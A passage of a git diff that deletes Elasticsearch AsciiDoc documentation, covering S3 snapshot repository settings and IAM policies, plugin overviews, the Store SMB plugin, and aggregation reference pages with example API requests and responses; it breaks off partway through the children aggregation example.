https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl[S3 - canned ACLs] : `private`, `public-read`, `public-read-write`, - `authenticated-read`, `log-delivery-write`, `bucket-owner-read`, - `bucket-owner-full-control`. Defaults to `private`. You could specify a - canned ACL using the `canned_acl` setting. When the S3 repository creates - buckets and objects, it adds the canned ACL into the buckets and objects. - -`storage_class`:: - - Sets the S3 storage class for objects stored in the snapshot repository. - Values may be `standard`, `reduced_redundancy`, `standard_ia`, `onezone_ia` - and `intelligent_tiering`. Defaults to `standard`. - Changing this setting on an existing repository only affects the - storage class for newly created objects, resulting in a mixed usage of - storage classes. Additionally, S3 Lifecycle Policies can be used to manage - the storage class of existing objects. Due to the extra complexity with the - Glacier class lifecycle, it is not currently supported by the plugin. For - more information about the different classes, see - https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html[AWS - Storage Classes Guide] - -NOTE: The option of defining client settings in the repository settings as -documented below is considered deprecated, and will be removed in a future -version. - -In addition to the above settings, you may also specify all non-secure <> -settings in the repository settings. In this case, the client settings found in -the repository settings will be merged with those of the named client used by -the repository. Conflicts between client and repository settings are resolved -by the repository settings taking precedence over client settings. - -For example: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "client": "my-client", - "bucket": "my-bucket", - "endpoint": "my.s3.endpoint" - } -} ----- -// TEST[skip:we don't have s3 set up while testing this] - -This sets up a repository that uses all client settings from the client -`my_client_name` except for the `endpoint` that is overridden to -`my.s3.endpoint` by the repository settings. - -[[repository-s3-permissions]] -===== Recommended S3 Permissions - -In order to restrict the Elasticsearch snapshot process to the minimum required -resources, we recommend using Amazon IAM in conjunction with pre-existing S3 -buckets. Here is an example policy which will allow the snapshot access to an S3 -bucket named "snaps.example.com". This may be configured through the AWS IAM -console, by creating a Custom Policy, and using a Policy Document similar to -this (changing snaps.example.com to your bucket name). - -[source,js] ----- -{ - "Statement": [ - { - "Action": [ - "s3:ListBucket", - "s3:GetBucketLocation", - "s3:ListBucketMultipartUploads", - "s3:ListBucketVersions" - ], - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com" - ] - }, - { - "Action": [ - "s3:GetObject", - "s3:PutObject", - "s3:DeleteObject", - "s3:AbortMultipartUpload", - "s3:ListMultipartUploadParts" - ], - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com/*" - ] - } - ], - "Version": "2012-10-17" -} ----- -// NOTCONSOLE - -You may further restrict the permissions by specifying a prefix within the -bucket, in this example, named "foo". - -[source,js] ----- -{ - "Statement": [ - { - "Action": [ - "s3:ListBucket", - "s3:GetBucketLocation", - "s3:ListBucketMultipartUploads", - "s3:ListBucketVersions" - ], - "Condition": { - "StringLike": { - "s3:prefix": [ - "foo/*" - ] - } - }, - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com" - ] - }, - { - "Action": [ - "s3:GetObject", - "s3:PutObject", - "s3:DeleteObject", - "s3:AbortMultipartUpload", - "s3:ListMultipartUploadParts" - ], - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com/foo/*" - ] - } - ], - "Version": "2012-10-17" -} ----- -// NOTCONSOLE - -The bucket needs to exist to register a repository for snapshots. If you did not -create the bucket then the repository registration will fail. - -[[repository-s3-aws-vpc]] -[discrete] -==== AWS VPC Bandwidth Settings - -AWS instances resolve S3 endpoints to a public IP. If the Elasticsearch -instances reside in a private subnet in an AWS VPC then all traffic to S3 will -go through the VPC's NAT instance. If your VPC's NAT instance is a smaller -instance size (e.g. a t2.micro) or is handling a high volume of network traffic -your bandwidth to S3 may be limited by that NAT instance's networking bandwidth -limitations. Instead we recommend creating a https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints.html[VPC endpoint] -that enables connecting to S3 in instances that reside in a private subnet in -an AWS VPC. This will eliminate any limitations imposed by the network -bandwidth of your VPC's NAT instance. - -Instances residing in a public subnet in an AWS VPC will connect to S3 via the -VPC's internet gateway and not be bandwidth limited by the VPC's NAT instance. diff --git a/docs/plugins/repository-shared-settings.asciidoc b/docs/plugins/repository-shared-settings.asciidoc deleted file mode 100644 index 13c2716c52d..00000000000 --- a/docs/plugins/repository-shared-settings.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -`max_restore_bytes_per_sec`:: - - Throttles per node restore rate. Defaults to unlimited. - Note that restores are also throttled through {ref}/recovery.html[recovery settings]. - -`max_snapshot_bytes_per_sec`:: - - Throttles per node snapshot rate. Defaults to `40mb` per second. - -`readonly`:: - - Makes repository read-only. Defaults to `false`. diff --git a/docs/plugins/repository.asciidoc b/docs/plugins/repository.asciidoc deleted file mode 100644 index 58da220862b..00000000000 --- a/docs/plugins/repository.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[repository]] -== Snapshot/Restore Repository Plugins - -Repository plugins extend the {ref}/modules-snapshots.html[Snapshot/Restore] -functionality in Elasticsearch by adding repositories backed by the cloud or -by distributed file systems: - -[discrete] -==== Core repository plugins - -The core repository plugins are: - -<>:: - -The S3 repository plugin adds support for using S3 as a repository. - -<>:: - -The Azure repository plugin adds support for using Azure as a repository. - -<>:: - -The Hadoop HDFS Repository plugin adds support for using HDFS as a repository. - -<>:: - -The GCS repository plugin adds support for using Google Cloud Storage service as a repository. - - -[discrete] -=== Community contributed repository plugins - -The following plugin has been contributed by our community: - -* https://github.com/BigDataBoutique/elasticsearch-repository-swift[Openstack Swift] (by Wikimedia Foundation and BigData Boutique) - - -include::repository-azure.asciidoc[] - -include::repository-s3.asciidoc[] - -include::repository-hdfs.asciidoc[] - -include::repository-gcs.asciidoc[] diff --git a/docs/plugins/security.asciidoc b/docs/plugins/security.asciidoc deleted file mode 100644 index 89927a3d6da..00000000000 --- a/docs/plugins/security.asciidoc +++ /dev/null @@ -1,24 +0,0 @@ -[[security]] -== Security Plugins - -Security plugins add a security layer to Elasticsearch. - -[discrete] -=== Core security plugins - -The core security plugins are: - -link:/products/x-pack/security[X-Pack]:: - -X-Pack is the Elastic product that makes it easy for anyone to add -enterprise-grade security to their Elastic Stack. Designed to address the -growing security needs of thousands of enterprises using the Elastic Stack -today, X-Pack provides peace of mind when it comes to protecting your data. - -[discrete] -=== Community contributed security plugins - -The following plugins have been contributed by our community: - -* https://github.com/sscarduzio/elasticsearch-readonlyrest-plugin[Readonly REST]: - High performance access control for Elasticsearch native REST API (by Simone Scarduzio) diff --git a/docs/plugins/store-smb.asciidoc b/docs/plugins/store-smb.asciidoc deleted file mode 100644 index 0dcdbb42595..00000000000 --- a/docs/plugins/store-smb.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[store-smb]] -=== Store SMB Plugin - -The Store SMB plugin works around for a bug in Windows SMB and Java on windows. - -:plugin_name: store-smb -include::install_remove.asciidoc[] - -[[store-smb-usage]] -==== Working around a bug in Windows SMB and Java on windows - -When using a shared file system based on the SMB protocol (like Azure File Service) to store indices, the way Lucene -open index segment files is with a write only flag. This is the _correct_ way to open the files, as they will only be -used for writes and allows different FS implementations to optimize for it. Sadly, in windows with SMB, this disables -the cache manager, causing writes to be slow. This has been described in -https://issues.apache.org/jira/browse/LUCENE-6176[LUCENE-6176], but it affects each and every Java program out there!. -This need and must be fixed outside of ES and/or Lucene, either in windows or OpenJDK. For now, we are providing an -experimental support to open the files with read flag, but this should be considered experimental and the correct way -to fix it is in OpenJDK or Windows. - -The Store SMB plugin provides two storage types optimized for SMB: - -`smb_mmap_fs`:: - - a SMB specific implementation of the default - {ref}/index-modules-store.html#mmapfs[mmap fs] - -`smb_simple_fs`:: - - a SMB specific implementation of the default - {ref}/index-modules-store.html#simplefs[simple fs] - -To use one of these specific storage types, you need to install the Store SMB plugin and restart the node. -Then configure Elasticsearch to set the storage type you want. - -This can be configured for all indices by adding this to the `elasticsearch.yml` file: - -[source,yaml] ----- -index.store.type: smb_simple_fs ----- - -Note that setting will be applied for newly created indices. - -It can also be set on a per-index basis at index creation time: - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "index.store.type": "smb_mmap_fs" - } -} ----- diff --git a/docs/plugins/store.asciidoc b/docs/plugins/store.asciidoc deleted file mode 100644 index b3d732217a5..00000000000 --- a/docs/plugins/store.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[store]] -== Store Plugins - -Store plugins offer alternatives to default Lucene stores. - -[discrete] -=== Core store plugins - -The core store plugins are: - -<>:: - -The Store SMB plugin works around for a bug in Windows SMB and Java on windows. - - -include::store-smb.asciidoc[] - diff --git a/docs/reference/aggregations.asciidoc b/docs/reference/aggregations.asciidoc deleted file mode 100644 index 57298e337ee..00000000000 --- a/docs/reference/aggregations.asciidoc +++ /dev/null @@ -1,434 +0,0 @@ -[[search-aggregations]] -= Aggregations - -[partintro] --- -An aggregation summarizes your data as metrics, statistics, or other analytics. -Aggregations help you answer questions like: - -* What's the average load time for my website? -* Who are my most valuable customers based on transaction volume? -* What would be considered a large file on my network? -* How many products are in each product category? - -{es} organizes aggregations into three categories: - -* <> aggregations that calculate metrics, -such as a sum or average, from field values. - -* <> aggregations that -group documents into buckets, also called bins, based on field values, ranges, -or other criteria. - -* <> aggregations that take input from -other aggregations instead of documents or fields. - -[discrete] -[[run-an-agg]] -=== Run an aggregation - -You can run aggregations as part of a <> by specifying the <>'s `aggs` parameter. The -following search runs a -<> on -`my-field`: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -Aggregation results are in the response's `aggregations` object: - -[source,console-result] ----- -{ - "took": 78, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 5, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [...] - }, - "aggregations": { - "my-agg-name": { <1> - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [] - } - } -} ----- -// TESTRESPONSE[s/"took": 78/"took": "$body.took"/] -// TESTRESPONSE[s/\.\.\.$/"took": "$body.took", "timed_out": false, "_shards": "$body._shards", /] -// TESTRESPONSE[s/"hits": \[\.\.\.\]/"hits": "$body.hits.hits"/] -// TESTRESPONSE[s/"buckets": \[\]/"buckets":\[\{"key":"get","doc_count":5\}\]/] - -<1> Results for the `my-agg-name` aggregation. - -[discrete] -[[change-agg-scope]] -=== Change an aggregation's scope - -Use the `query` parameter to limit the documents on which an aggregation runs: - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "range": { - "@timestamp": { - "gte": "now-1d/d", - "lt": "now/d" - } - } - }, - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -[discrete] -[[return-only-agg-results]] -=== Return only aggregation results - -By default, searches containing an aggregation return both search hits and -aggregation results. To return only aggregation results, set `size` to `0`: - -[source,console] ----- -GET /my-index-000001/_search -{ - "size": 0, - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -[discrete] -[[run-multiple-aggs]] -=== Run multiple aggregations - -You can specify multiple aggregations in the same request: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-first-agg-name": { - "terms": { - "field": "my-field" - } - }, - "my-second-agg-name": { - "avg": { - "field": "my-other-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] -// TEST[s/my-other-field/http.response.bytes/] - -[discrete] -[[run-sub-aggs]] -=== Run sub-aggregations - -Bucket aggregations support bucket or metric sub-aggregations. For example, a -terms aggregation with an <> -sub-aggregation calculates an average value for each bucket of documents. There -is no level or depth limit for nesting sub-aggregations. - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - }, - "aggs": { - "my-sub-agg-name": { - "avg": { - "field": "my-other-field" - } - } - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/_search/_search?size=0/] -// TEST[s/my-field/http.request.method/] -// TEST[s/my-other-field/http.response.bytes/] - -The response nests sub-aggregation results under their parent aggregation: - -[source,console-result] ----- -{ - ... - "aggregations": { - "my-agg-name": { <1> - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "foo", - "doc_count": 5, - "my-sub-agg-name": { <2> - "value": 75.0 - } - } - ] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits",/] -// TESTRESPONSE[s/"key": "foo"/"key": "get"/] -// TESTRESPONSE[s/"value": 75.0/"value": $body.aggregations.my-agg-name.buckets.0.my-sub-agg-name.value/] - -<1> Results for the parent aggregation, `my-agg-name`. -<2> Results for `my-agg-name`'s sub-aggregation, `my-sub-agg-name`. - -[discrete] -[[add-metadata-to-an-agg]] -=== Add custom metadata - -Use the `meta` object to associate custom metadata with an aggregation: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - }, - "meta": { - "my-metadata-field": "foo" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/_search/_search?size=0/] - -The response returns the `meta` object in place: - -[source,console-result] ----- -{ - ... - "aggregations": { - "my-agg-name": { - "meta": { - "my-metadata-field": "foo" - }, - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits",/] - -[discrete] -[[return-agg-type]] -=== Return the aggregation type - -By default, aggregation results include the aggregation's name but not its type. -To return the aggregation type, use the `typed_keys` query parameter. - -[source,console] ----- -GET /my-index-000001/_search?typed_keys -{ - "aggs": { - "my-agg-name": { - "histogram": { - "field": "my-field", - "interval": 1000 - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/typed_keys/typed_keys&size=0/] -// TEST[s/my-field/http.response.bytes/] - -The response returns the aggregation type as a prefix to the aggregation's name. - -IMPORTANT: Some aggregations return a different aggregation type from the -type in the request. For example, the terms, -<>, -and <> -aggregations return different aggregations types depending on the data type of -the aggregated field. - -[source,console-result] ----- -{ - ... - "aggregations": { - "histogram#my-agg-name": { <1> - "buckets": [] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits",/] -// TESTRESPONSE[s/"buckets": \[\]/"buckets":\[\{"key":1070000.0,"doc_count":5\}\]/] - -<1> The aggregation type, `histogram`, followed by a `#` separator and the aggregation's name, `my-agg-name`. - -[discrete] -[[use-scripts-in-an-agg]] -=== Use scripts in an aggregation - -Some aggregations support <>. You can -use a `script` to extract or generate values for the aggregation: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "histogram": { - "interval": 1000, - "script": { - "source": "doc['my-field'].value.length()" - } - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -If you also specify a `field`, the `script` modifies the field values used in -the aggregation. The following aggregation uses a script to modify `my-field` -values: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "histogram": { - "field": "my-field", - "interval": 1000, - "script": "_value / 1000" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.response.bytes/] - -Some aggregations only work on specific data types. Use the `value_type` -parameter to specify a data type for a script-generated value or an unmapped -field. `value_type` accepts the following values: - -* `boolean` -* `date` -* `double`, used for all floating-point numbers -* `long`, used for all integers -* `ip` -* `string` - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "histogram": { - "field": "my-field", - "interval": 1000, - "script": "_value / 1000", - "value_type": "long" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.response.bytes/] - -[discrete] -[[agg-caches]] -=== Aggregation caches - -For faster responses, {es} caches the results of frequently run aggregations in -the <>. To get cached results, use the -same <> for each search. If you -don't need search hits, <> to avoid -filling the cache. - -{es} routes searches with the same preference string to the same shards. If the -shards' data doesn’t change between searches, the shards return cached -aggregation results. - -[discrete] -[[limits-for-long-values]] -=== Limits for `long` values - -When running aggregations, {es} uses <> values to hold and -represent numeric data. As a result, aggregations on <> numbers -greater than +2^53^+ are approximate. --- - -include::aggregations/bucket.asciidoc[] - -include::aggregations/metrics.asciidoc[] - -include::aggregations/pipeline.asciidoc[] diff --git a/docs/reference/aggregations/bucket.asciidoc b/docs/reference/aggregations/bucket.asciidoc deleted file mode 100644 index 233bc0da648..00000000000 --- a/docs/reference/aggregations/bucket.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[search-aggregations-bucket]] -== Bucket aggregations - -Bucket aggregations don't calculate metrics over fields like the metrics aggregations do, but instead, they create -buckets of documents. Each bucket is associated with a criterion (depending on the aggregation type) which determines -whether or not a document in the current context "falls" into it. In other words, the buckets effectively define document -sets. In addition to the buckets themselves, the `bucket` aggregations also compute and return the number of documents -that "fell into" each bucket. - -Bucket aggregations, as opposed to `metrics` aggregations, can hold sub-aggregations. These sub-aggregations will be -aggregated for the buckets created by their "parent" bucket aggregation. - -There are different bucket aggregators, each with a different "bucketing" strategy. Some define a single bucket, some -define fixed number of multiple buckets, and others dynamically create the buckets during the aggregation process. - -NOTE: The maximum number of buckets allowed in a single response is limited by a -dynamic cluster setting named -<>. It defaults to 65,535. -Requests that try to return more than the limit will fail with an exception. - -include::bucket/adjacency-matrix-aggregation.asciidoc[] - -include::bucket/autodatehistogram-aggregation.asciidoc[] - -include::bucket/children-aggregation.asciidoc[] - -include::bucket/composite-aggregation.asciidoc[] - -include::bucket/datehistogram-aggregation.asciidoc[] - -include::bucket/daterange-aggregation.asciidoc[] - -include::bucket/diversified-sampler-aggregation.asciidoc[] - -include::bucket/filter-aggregation.asciidoc[] - -include::bucket/filters-aggregation.asciidoc[] - -include::bucket/geodistance-aggregation.asciidoc[] - -include::bucket/geohashgrid-aggregation.asciidoc[] - -include::bucket/geotilegrid-aggregation.asciidoc[] - -include::bucket/global-aggregation.asciidoc[] - -include::bucket/histogram-aggregation.asciidoc[] - -include::bucket/iprange-aggregation.asciidoc[] - -include::bucket/missing-aggregation.asciidoc[] - -include::bucket/nested-aggregation.asciidoc[] - -include::bucket/parent-aggregation.asciidoc[] - -include::bucket/range-aggregation.asciidoc[] - -include::bucket/rare-terms-aggregation.asciidoc[] - -include::bucket/reverse-nested-aggregation.asciidoc[] - -include::bucket/sampler-aggregation.asciidoc[] - -include::bucket/significantterms-aggregation.asciidoc[] - -include::bucket/significanttext-aggregation.asciidoc[] - -include::bucket/terms-aggregation.asciidoc[] - -include::bucket/variablewidthhistogram-aggregation.asciidoc[] - -include::bucket/range-field-note.asciidoc[] diff --git a/docs/reference/aggregations/bucket/adjacency-matrix-aggregation.asciidoc b/docs/reference/aggregations/bucket/adjacency-matrix-aggregation.asciidoc deleted file mode 100644 index 407695dc2ed..00000000000 --- a/docs/reference/aggregations/bucket/adjacency-matrix-aggregation.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[[search-aggregations-bucket-adjacency-matrix-aggregation]] -=== Adjacency matrix aggregation -++++ -Adjacency matrix -++++ - -A bucket aggregation returning a form of {wikipedia}/Adjacency_matrix[adjacency matrix]. -The request provides a collection of named filter expressions, similar to the `filters` aggregation -request. -Each bucket in the response represents a non-empty cell in the matrix of intersecting filters. - -Given filters named `A`, `B` and `C` the response would return buckets with the following names: - - -[options="header"] -|======================= -| h|A h|B h|C -h|A |A |A&B |A&C -h|B | |B |B&C -h|C | | |C -|======================= - -The intersecting buckets e.g `A&C` are labelled using a combination of the two filter names separated by -the ampersand character. Note that the response does not also include a "C&A" bucket as this would be the -same set of documents as "A&C". The matrix is said to be _symmetric_ so we only return half of it. To do this we sort -the filter name strings and always use the lowest of a pair as the value to the left of the "&" separator. - -An alternative `separator` parameter can be passed in the request if clients wish to use a separator string -other than the default of the ampersand. - - -Example: - -[source,console] --------------------------------------------------- -PUT /emails/_bulk?refresh -{ "index" : { "_id" : 1 } } -{ "accounts" : ["hillary", "sidney"]} -{ "index" : { "_id" : 2 } } -{ "accounts" : ["hillary", "donald"]} -{ "index" : { "_id" : 3 } } -{ "accounts" : ["vladimir", "donald"]} - -GET emails/_search -{ - "size": 0, - "aggs" : { - "interactions" : { - "adjacency_matrix" : { - "filters" : { - "grpA" : { "terms" : { "accounts" : ["hillary", "sidney"] }}, - "grpB" : { "terms" : { "accounts" : ["donald", "mitt"] }}, - "grpC" : { "terms" : { "accounts" : ["vladimir", "nigel"] }} - } - } - } - } -} --------------------------------------------------- - -In the above example, we analyse email messages to see which groups of individuals -have exchanged messages. -We will get counts for each group individually and also a count of messages for pairs -of groups that have recorded interactions. - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "interactions": { - "buckets": [ - { - "key":"grpA", - "doc_count": 2 - }, - { - "key":"grpA&grpB", - "doc_count": 1 - }, - { - "key":"grpB", - "doc_count": 2 - }, - { - "key":"grpB&grpC", - "doc_count": 1 - }, - { - "key":"grpC", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 9/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Usage -On its own this aggregation can provide all of the data required to create an undirected weighted graph. -However, when used with child aggregations such as a `date_histogram` the results can provide the -additional levels of data required to perform {wikipedia}/Dynamic_network_analysis[dynamic network analysis] -where examining interactions _over time_ becomes important. - -==== Limitations -For N filters the matrix of buckets produced can be N²/2 and so there is a default maximum -imposed of 100 filters . This setting can be changed using the `index.max_adjacency_matrix_filters` index-level setting -(note this setting is deprecated and will be repaced with `indices.query.bool.max_clause_count` in 8.0+). diff --git a/docs/reference/aggregations/bucket/autodatehistogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/autodatehistogram-aggregation.asciidoc deleted file mode 100644 index 8f8912a29d6..00000000000 --- a/docs/reference/aggregations/bucket/autodatehistogram-aggregation.asciidoc +++ /dev/null @@ -1,316 +0,0 @@ -[[search-aggregations-bucket-autodatehistogram-aggregation]] -=== Auto-interval date histogram aggregation -++++ -Auto-interval date histogram -++++ - -A multi-bucket aggregation similar to the <> except -instead of providing an interval to use as the width of each bucket, a target number of buckets is provided -indicating the number of buckets needed and the interval of the buckets is automatically chosen to best achieve -that target. The number of buckets returned will always be less than or equal to this target number. - -The buckets field is optional, and will default to 10 buckets if not specified. - -Requesting a target of 10 buckets. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "auto_date_histogram": { - "field": "date", - "buckets": 10 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Keys - -Internally, a date is represented as a 64 bit number representing a timestamp -in milliseconds-since-the-epoch. These timestamps are returned as the bucket -++key++s. The `key_as_string` is the same timestamp converted to a formatted -date string using the format specified with the `format` parameter: - -TIP: If no `format` is specified, then it will use the first date -<> specified in the field mapping. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "auto_date_histogram": { - "field": "date", - "buckets": 5, - "format": "yyyy-MM-dd" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Supports expressive date <> - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sales_over_time": { - "buckets": [ - { - "key_as_string": "2015-01-01", - "key": 1420070400000, - "doc_count": 3 - }, - { - "key_as_string": "2015-02-01", - "key": 1422748800000, - "doc_count": 2 - }, - { - "key_as_string": "2015-03-01", - "key": 1425168000000, - "doc_count": 2 - } - ], - "interval": "1M" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Intervals - -The interval of the returned buckets is selected based on the data collected by the -aggregation so that the number of buckets returned is less than or equal to the number -requested. The possible intervals returned are: - -[horizontal] -seconds:: In multiples of 1, 5, 10 and 30 -minutes:: In multiples of 1, 5, 10 and 30 -hours:: In multiples of 1, 3 and 12 -days:: In multiples of 1, and 7 -months:: In multiples of 1, and 3 -years:: In multiples of 1, 5, 10, 20, 50 and 100 - -In the worst case, where the number of daily buckets are too many for the requested -number of buckets, the number of buckets returned will be 1/7th of the number of -buckets requested. - -==== Time Zone - -Date-times are stored in Elasticsearch in UTC. By default, all bucketing and -rounding is also done in UTC. The `time_zone` parameter can be used to indicate -that bucketing should use a different time zone. - -Time zones may either be specified as an ISO 8601 UTC offset (e.g. `+01:00` or -`-08:00`) or as a timezone id, an identifier used in the TZ database like -`America/Los_Angeles`. - -Consider the following example: - -[source,console] ---------------------------------- -PUT my-index-00001/log/1?refresh -{ - "date": "2015-10-01T00:30:00Z" -} - -PUT my-index-00001/log/2?refresh -{ - "date": "2015-10-01T01:30:00Z" -} - -PUT my-index-00001/log/3?refresh -{ - "date": "2015-10-01T02:30:00Z" -} - -GET my-index-00001/_search?size=0 -{ - "aggs": { - "by_day": { - "auto_date_histogram": { - "field": "date", - "buckets" : 3 - } - } - } -} ---------------------------------- - -UTC is used if no time zone is specified, three 1-hour buckets are returned -starting at midnight UTC on 1 October 2015: - -[source,console-result] ---------------------------------- -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-10-01T00:00:00.000Z", - "key": 1443657600000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T01:00:00.000Z", - "key": 1443661200000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T02:00:00.000Z", - "key": 1443664800000, - "doc_count": 1 - } - ], - "interval": "1h" - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -If a `time_zone` of `-01:00` is specified, then midnight starts at one hour before -midnight UTC: - -[source,console] ---------------------------------- -GET my-index-00001/_search?size=0 -{ - "aggs": { - "by_day": { - "auto_date_histogram": { - "field": "date", - "buckets" : 3, - "time_zone": "-01:00" - } - } - } -} ---------------------------------- -// TEST[continued] - - -Now three 1-hour buckets are still returned but the first bucket starts at -11:00pm on 30 September 2015 since that is the local time for the bucket in -the specified time zone. - -[source,console-result] ---------------------------------- -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-09-30T23:00:00.000-01:00", <1> - "key": 1443657600000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T00:00:00.000-01:00", - "key": 1443661200000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T01:00:00.000-01:00", - "key": 1443664800000, - "doc_count": 1 - } - ], - "interval": "1h" - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> The `key_as_string` value represents midnight on each day - in the specified time zone. - -WARNING: When using time zones that follow DST (daylight savings time) changes, -buckets close to the moment when those changes happen can have slightly different -sizes than neighbouring buckets. -For example, consider a DST start in the `CET` time zone: on 27 March 2016 at 2am, -clocks were turned forward 1 hour to 3am local time. If the result of the aggregation -was daily buckets, the bucket covering that day will only hold data for 23 hours -instead of the usual 24 hours for other buckets. The same is true for shorter intervals -like e.g. 12h. Here, we will have only a 11h bucket on the morning of 27 March when the -DST shift happens. - -==== Scripts - -Like with the normal <>, both document level -scripts and value level scripts are supported. This aggregation does not however, support the `min_doc_count`, -`extended_bounds`, `hard_bounds` and `order` parameters. - -==== Minimum Interval parameter - -The `minimum_interval` allows the caller to specify the minimum rounding interval that should be used. -This can make the collection process more efficient, as the aggregation will not attempt to round at -any interval lower than `minimum_interval`. - -The accepted units for `minimum_interval` are: - -* year -* month -* day -* hour -* minute -* second - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sale_date": { - "auto_date_histogram": { - "field": "date", - "buckets": 10, - "minimum_interval": "minute" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sale_date": { - "auto_date_histogram": { - "field": "date", - "buckets": 10, - "missing": "2000/01/01" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `publish_date` field will fall into the same bucket as documents that have the value `2000-01-01`. - diff --git a/docs/reference/aggregations/bucket/children-aggregation.asciidoc b/docs/reference/aggregations/bucket/children-aggregation.asciidoc deleted file mode 100644 index fb355caeaa4..00000000000 --- a/docs/reference/aggregations/bucket/children-aggregation.asciidoc +++ /dev/null @@ -1,226 +0,0 @@ -[[search-aggregations-bucket-children-aggregation]] -=== Children aggregation -++++ -Children -++++ - -A special single bucket aggregation that selects child documents that have the specified type, as defined in a <>. - -This aggregation has a single option: - -* `type` - The child type that should be selected. - -For example, let's say we have an index of questions and answers. The answer type has the following `join` field in the mapping: - -[source,console] --------------------------------------------------- -PUT child_example -{ - "mappings": { - "properties": { - "join": { - "type": "join", - "relations": { - "question": "answer" - } - } - } - } -} --------------------------------------------------- - -The `question` document contain a tag field and the `answer` documents contain an owner field. With the `children` -aggregation the tag buckets can be mapped to the owner buckets in a single request even though the two fields exist in -two different kinds of documents. - -An example of a question document: - -[source,console] --------------------------------------------------- -PUT child_example/_doc/1 -{ - "join": { - "name": "question" - }, - "body": "

